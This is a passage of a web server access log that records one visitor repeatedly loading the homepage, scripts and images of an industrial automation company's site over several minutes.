10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10410] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:45:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:46:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20971] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20960] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20908] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 